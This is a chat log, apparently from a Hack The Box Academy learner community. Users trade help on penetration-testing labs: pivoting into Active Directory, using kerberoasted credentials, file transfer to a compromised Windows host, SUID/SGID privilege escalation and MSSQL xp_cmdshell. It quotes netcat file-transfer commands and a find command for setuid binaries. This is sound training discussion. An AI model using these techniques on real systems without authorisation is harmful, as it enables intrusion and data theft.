poetry run crackmapexec Traceback (most recent call last): File "<string>", line 1, in <module> File "/usr/lib/python3.11/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "<frozen importlib._bootstrap>", line 1206, in _gcd_import File "<frozen importlib._bootstrap>", line 1178, in _find_and_load File "<frozen importlib._bootstrap>", line 1149, in _find_and_load_unlocked File "<frozen importlib._bootstrap>", line 690, in _load_unlocked File "<frozen importlib._bootstrap_external>", line 940, in exec_module File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed File "/home/aesliex/Desktop/CrackMapExec/cme/crackmapexec.py", line 3, in <module> from cme.helpers.logger import highlight File "/home/aesliex/Desktop/CrackMapExec/cme/helpers/logger.py", line 5, in <module> from termcolor import colored ModuleNotFoundError: No module named 'termcolor'

how can i fix this?

Slightly unish related question, what module are you working on?

module/147/section/1327

password attacks in pentester path

Password attacks, what section? Numbers don't mean anything to anyone here.

network services

So you're trying to install cme from source?

i installed it using gitclone, but when i do poetry run crackmapexec it doesnt work

i tried apt-get install -y libssl-dev libffi-dev python-dev build-essential but it didnt work

it said this error - apt-get install -y libssl-dev libffi-dev python-dev build-essential
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Package python-dev is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
However the following packages replace it:
python-dev-is-python3

Question so I am doing the Active Directory Enumeration Attacks and I am suppose to get the password policy from inlanefreight.local you are giving the outward face host ip and SSH credentials. I ssh into the host and search the /etc/hosts to see if inlanefreight.local is there and it is. I tried to ping its assocaited address and get host unreachable. I also wanted to comfirm with nslookup inlanefreight.local to see if it could get resolved and nothing showed. Why would the hosts be unreachable?

I'll save you some potential heartache. Netexec is the replacement for crackmap

https://github.com/Pennyw0rth/NetExec

oh tyy

Module Injection Attacks, section Exploitation of PDF Generation Vulnerabilities. How do you properly enumerate the internal web application? The payloads in the section mostly show errors for me

Hey @fathom pendant i have a question for you, i want to be a pentester in the future, on the platform, do you recommend to do first all the general moduls?

@analog dock you can also give you meaning ^^

why are you randomly pinging people

🥲

its not random its bcs i see you guys helping a lot so i concluded that you have more knowledge and probably beter advice to give ^^

Im rarely in here

hmm rare i saw you a few times, so do you have a lot of knowledge? I mean what should you suggest

How do we display these edges on Bloodhound?

Theres literally a pentester path on academy

So idk what else you want tbh

i know i also doing it but the thing is that in this path they also give you modules to do where you don't immidiatly have acces to like tier IV modules so what is the point for going further by skipping modules you can't do

SQLMap Essentials

Skills Assessment please give me a hint, i have looked in all the page and i cant find yet what form sends a request

-- skip_ssl at the end should fix this

Look for a button that triggers an event

Have the network tab open the whole time too

Hey

anything like crackmapexec but for windows. i got a user and want to run creds across whole ad subnet.

I meant wydm 😂, but that’s cool, just trying to finish the the cpts path myself

What academy module is this for?

Read and follow #welcome to access more of the server

ad enumeration and attack skill assessment. also asking for general purpose too

I mean powerview is a good tool

But in general you want to use pivoting techniques where you can

My strategy for tools to use are grabbing them from the target boxes from the module

:]

Also netexec >> crackmapexec

Doesn’t netexec have a windows version?

You should be pivoting like marcielee said tho

Need something for windows. Powerview requires scripting (will see this). Asking one other thing about approach. so i got creds with kerberoasting. now i want to check which machine the creds belong too. is this the right approach. I dont know which machine will get unlocked by the creds.

Thanks. I dont know which machine (dont know ip or name of host) i can get access to using creds. so checking full subnet

U need to use a pivoting tool and u can do it from Linux with crackmapexec

U can do a ping sweep

pingsweep gives list of active hosts. Bruteforcing part is stil the same. lets try using netexec. Also am i doing this right? (asking as per methodology)

Where are u getting bruteforcing from?

Why don’t you just do everything from your Linux machine?

apparently the internal ad seems not to be accessible from the outer machine. nxc or any other linux tool gives "Failed to create connection object for target 172.16.6.59, exiting... "

Yes, we said to use a pivoting tool to get access to that like 3 times

Why do u keep ignoring the pivoting part of my sentences 💀

Do you know how to pivot?

not ignoring. reading about pivoting rn.

Learning pivoting is a whole lesson itself

It’s recommended to do pivoting then the ad module

Going for it now. Thanks a lot brother

Hi, recently subscribe to the Silver Plan where you get 200 cubes each moth is it accumulative or does it clear each month??? Thanks in advance.

its accumulative

@fathom pendant I already found the parameter, I don't understand why automated tools don't detect it

about to get started on my HTB journey, i understand its a more hands on approach which i enjoy, but does anyone have any tips/best practices theyve found when it comes to note taking of what i should make notes of as i procedd?

I used the command to disable av in the windows infiltrating exercise but when I went to setting it's still on

I solved the lab but I was wondering why that happened

Whatever style of notes that work best for you . Everyone is different. Some like taking huge chunks from the material, others like rewording the material into a way they understand. I like doing a little walkthrough for each section capturing commands and output.

Bare minimum document every user/credential/hash/key you come across, you never know when another section in the same module will use the previous findings.

def dont wanna deal with my hand writing for that, do you just use a word doc or do ya have a note taking app youd reccomened?

Most around here use Obsidian, but there's notion, cherrytree, one note, Joplin, and more.

ive heard of obsidian before, will give it a look. thank you!

Thanks @old oasis

If you're doing the pentester path. Pivoting comes before ad

I'm having trouble with this question: Some PowerShell code has been loaded into memory that scans/targets network shares. Leverage the available PowerShell logs to identify from which popular hacking tool this code derives. Answer format (one word): P____V___.

I currently filtered for powershell.file.script_text and ranged it in between the dates of the intial breach. Then I searched for P*V within the text block

Any help would be great

Well your issue is trying to directly look for the broad tool name

Instead of identifying what the code does, and identifying what invoke/get/whatever command is used and correlating that to the tool

Without something to lessen the load then I'll manually be looking at 100s of logs.

Hey guys,
I just started the pentest path and I’m using a local machine with openvpn. Connection is successful but on the module, I’m not able to reach the IPs they are using. Any idea how I can fix this issue? For instance I’m told to run nmap 10.0.0.5 but the host is down when I try it locally

What module and section.?

Well that's an example ip, so it won't be reachable

Threat Hunting & Threat Intelligence Fundamentals
Hunting for Stuxbox
Question 3

Oh😂. Thank you. I thought those ips were live

Only the targets spawned by "Click here to spawn target!" Are live

Also the scope of internal ips is 10.129.0.0/16 iirc

Aka only start with 10.129.x.x

Did you try googling some of the log entries?

Thanks!

Just copy/paste into google

Welp

That was 10 secs to the answer

Thanks a lot lol

¯_(ツ)_/¯

Overthinking gets us all

#rules 5 keep it English

Also not the place for that see #welcome

règle n°5, restez en anglais, vous n'obtiendrez pas de réponse en français. @mortal mirage #welcome

Just in case they don't speak English

A silly little skid video

please don't promote your content here

french ew

Voice mod as well making it barely audible, even for french

Hoping for some guidance of those who have completed this section. In the Whitebox Attacks - Type juggling assessment am I supposed to stick to the Sha256 magic hashes and am I correct that the username has to include 'admin' in it, but it cant be at the beginning? I've been working on this for 3 days and I am not sure what else to try

Please🙏

The hell is that link

Again?!

@mortal mirage give it a rest, read #rules

there was a link? can I click on it?

..and you got a thumbs down

oh, it was just a YouTube link that's lame. i thought it was a phish

In the Ad attack skill assesssment 1. How we are supposed to transfer other tools from linux to windows. It only allowed rubeus.exe and mimikat.exe. other than that no other outside exe are allowed or is getting filtered by. I'am trying to upload the ligolo-ng to the windows. So far i have tried the upload method in the web shell as well as the pythohn server and the impacket- smbserver. Apparently the server i have access to does not allow http protocol.

i even tried exe2hex, but somehow it also get filtered by the av too.

no need for all off that

you should be able to transfer files using one of the method you mention

Keep it simple, and build up from there

Also there's no av in that module

BITSADMIN version 3.0
BITS administration utility.
(C) Copyright Microsoft Corp.

Unable to complete transfer.
ERROR CODE: 0x80200013 - The server does not support the necessary HTTP protocol. Background Intelligent Transfer Service (BITS) requires that the server support the Range protocol header.

never seen this before

even the python http server is not working too.

you are trying to upload from your machine (linux) to the target (windows) right ?

yes

i have a windows reverse shell. if that matters

You try wget or curl.exe?

or maybe just smb

net use ....

Hey guys im stuck on file transfering

I started an ftp server on my local machine but my commande on the remote host doesnt work any ideas?

Is your ftp server hosted on your filesystem root?

No from user

Then why are you trying to specify the /home/user, from the perspective of the ftp connection its looking for /home/user/home/user... from your request

The other thing not being able to connect to your server

But I'm assuming that 10.0.2.15 is your tun0 ip

Though usually I've seen those ips as 10.10.x.x.

no its my enp0s3 ip

Well that's why it can't connect

Okej thank you just need to find the right path know 🙂

The spawned target doesn't have a route to your enpos ip

Use the tun0 ip to connect back to

:)

tun0 is usually the interface used by the vpn

^

Your enpos ip is your own local network

Okej but i don't really understand what you mean with the file path? Should i not right the whole pwd?

not working

Yes

Whenever you host a fileshare, the share starts from where you're sharing from

It would be kinda scary if you could arbitrarily grab any file from any arbitrary Share point

I'd assume your command is wrong but without providing anything to go off of ¯_(ツ)_/¯

if your ftp is hosted in /home/user , and you did like ftp://ip/home/user , it will go to /home/user/home/user which is not the right path

Ow okej get it thank you guys

You specify the relative filepath from where the share is hosted

So Downloads/upload_win.zip

On the receiving end running,

nc -l -p 1234 > out.file

will begin listening on port 1234.

On the sending end running,

nc -w 3 [destination] 1234 < out.file

used this btw its blocking outer tools like ligolo-ng and not rubeus. I think it has something to do with htb.

Got it thank you for the information

@shut quest

there's no AV, so nothing is really blocked

if you can show us , which cmd you running

it will be easier to debug it

unable to send image here

#welcome

Doubtful, why not try setting up a simple python http server from your machine and assuming you have powershell on the remote end using wget ip:port/file -o file

worked. if i use wget http:// it doesnt work. Thanks a lot.

whats the deal with sqlmap "What's the contents of table flag5? (Case #5) " it keeps giving what looks like parts of a flag. Have restarted several times

Hello, I'm completely new to all of this and want to get into cyber security Eager to learn anything and everything. I need guidance/mentor
Dms are open

u still on this?

You'll need to repeat it a few times to piece together the fill flag

No, I took to the forums and saw several had to keep restarting the lab and eventually got it to work. I hope the exam is not that buggy lol

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Unless you're willing to pay me $1k/week I don't do mentoring

And even then I'm underselling myself

ways to transfer tools to the internal pwned machine when pivoting.

check transfer files module

what the hell am i looking at

the sudden jump from finding a flag with the find command to this is crazy

i dont understand a thing this section told me (linux privilege escalation > special permissions)

re-read it then

then re-read it

ive tried, what i understood is that some files can only be executed/read/modified/whatever by a certain group with permissions to do so or to do it as another user with those permissions

but i feel like its so briefly touched upon

that's pretty much it what don't you understand?

check linux fundamentals Permission Management section

what the question is asking me and i guess a breakdown of the commands they gave me

find / -user root -perm -6000 -exec ls -ldb {} ; 2>/dev/null

Did you visit any of the links on the page that you read?

ask chatgpt to break down the command

like i get most of this, but -6000 is whats throwing me off

-6000 it's a SGID

i did, but its still not clicking for me

it allows you to run binary, as the group who own it

as far as the questions, there are binaries with the setuid and setgid bit set and it just wants you to find them with the find commands that locate them

chatgpt will tell you exactly what each part of the command means

so if im part of the group with SGID 6000 i can run that binary?

worth a shot honestly, didnt cross my mind

how does ur htb look like that?

how else is it meant to look

From one of the links

Unlike the setuid bit, the setgid bit has effect on both files and directories. In the first case, the file which has the setgid bit set, when executed, instead of running with the privileges of the group of the user who started it, runs with those of the group which owns the file: in other words, the group ID of the process will be the same of that of the file.

unless its dark theme and it syncs to systems settings and ive never known there was a light theme

just re-read the page in the link

hello guys

please i need help

Goblin please my eyes

😅

woah the fuck

thats sick

in password attack hard lab i am trying to transfer a kdbx file form the windows target machine to my attack machine

https://tenor.com/view/spongebob-squarepants-movies-animation-nicktoons-nickelodeon-gif-16452379

javascript: (
function () { 
// the css we are going to inject
var css = 'html {-webkit-filter: invert(100%);' +
    '-moz-filter: invert(100%);' + 
    '-o-filter: invert(100%);' + 
    '-ms-filter: invert(100%); }',

head = document.getElementsByTagName('head')[0],
style = document.createElement('style');

// a hack, so you can "invert back" clicking the bookmarklet again
if (!window.counter) { window.counter = 1;} else  { window.counter ++;
if (window.counter % 2 == 0) { var css ='html {-webkit-filter: invert(0%); -moz-filter:    invert(0%); -o-filter: invert(0%); -ms-filter: invert(0%); }'}
 };

style.type = 'text/css';
if (style.styleSheet){
style.styleSheet.cssText = css;
} else {
style.appendChild(document.createTextNode(css));
}

//injecting the css to the head
head.appendChild(style);
}());

that should be a serious rule break

What's your question?

What, light mode?

ya lol

Because if so.. yeah... it burns

i hate light mode, but the creme color is really selling me

it hurts even with black glasses

https://tenor.com/view/eyes-burning-my-eyes-spongebob-gif-5183364

any hints for command injection skill assessment cbbh ?

My hint is to go over the module.

Finally yessssssssss 👍 Solved it

did you ever solve this?

what module

this is web fuzzing

final skill assessment

It's suid + sgid

@spare path why are you filtering out 200 response code?

it floods the terminal if I don't

I guess that's my mistake

Use a different thing to filter out

ok will investigate thank you

As 200 response code will also be what the actual valid response will give

I did wonder that

regex would be my next guess

Perhaps size may be a better filter

ah

How are the exploit development modules in htb academy?

i don't think there are any

Yeah there's not really a maldev academy module

i'd recommend maldev academy

have u tried a get request instead?

i remember seeing a -X POST in your command

ah I have not yet

get request shouldve been the first method you tried

trying this command will take a while to complete is this a sensible way to fuzz the GET? ||python3 api_fuzzer.py http://IP:PORT/admin/panel.php --timeout 5 -o||

are you literally using IP:PORT or did you replace those with the actual ip and port?

I did replace

so the last lead I was following is the parameter ||accessID|| which the page will spit out to you if you do a basic curl I'm trying to figure out where to fuzz that param or how

sqsh isnt returning any output for basically any comand

What is api fuzzer?

Did u try panel.php?accessID=

it's searching for valid endpoints

Wydm just use ffuf

ig you need ;

i think i remember having issues with sqsh too and just used sqlcmd, worked great

I perfer msssqlcient

this is mssql not mysql

yeah i ended up using it

sorry my bad

i found the pass of the mssqlsvc user, but auth with it isnt working

remember there's two ways of authentication

WOOOHOO I found it thanks folks!

everyone's advice was helpful in the end used most of it

i guessed so but does this mean i have to rdp and go from there?

nah you can use -windows-auth

idk if this is the right name of options but check the help

interesting

i wonder how does this works

Mssqlclient is great

Can just type a command and it does it for you

Like enable xp_cmdshell

how does the windows auth part works?i thought that the mssql server authenticate from the context of a loggedin user

authenticate against the machine , instead of the domain

like local-auth in nxc

but if for example the rdp port is closed, how are u still able to auth?

re-read the section

d0s3nt literally gave you the answer

has nothing to do with rdp

Rdp isn’t only for domains

What i understand is that, it uses your already loggedin session to authenticate you against the sql server

you know the difference between SAM and NTDS ?

you don't need to post contents of the module

yes

but this machine isnt domain joined right?

so local-auth authenticate against SAM

you can authenticate against services if they have their own username/password scheme or you can authenticate against other things like windows

i understand the concept, i want to know how it is done technically

you've spent all this time asking about it over and over instead of just reading the section again

plus d0s3nt gave you the answer

the only way to know more is to open mssqlclient and read the code

did you do the footprinting module already?

hello

i was doing footprinting module and in domain enumration it is sending request to shodan to find moreinfo . when i tried it there is access denied (403 forbidden) i initialized my api key

Hi

then i was thinking maybe my credits are empty so i created new acc and then tried same error

there's another parameter you need to add to your command to change it from service authentication to windows authentication, it's that simple.

??

403 means you don't have access to that resource

https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/403

yeah i know but how come i dont have credits in shodan when i created new account

403 doesn't necessarily mean no credits. it means the user you authenticated with doesn't have access to that resource. https://help.shodan.io/the-basics/credit-types-explained

i think the command is something like shodan info to see how many you have

i forget exactly but use the help option to find out

So I've found the subdomain and I'm just kind of pulling a blank on what to do next with this info. When I try ||ffuf -w common.txt -u http://subdomain.fuzzing_domain.htb:PORT/FUZZ -e .php,.html,.txt,.bak,.js -v|| I just get a bunch of errors piling up

I've replaced the exact port and domains etc for spoiler purposes

also where I can ask about help for VM networking?

its a vhost not dns record

u have to fuzz the host header

ok let me think on this

capture a request with burp and look at the host header

Almost finished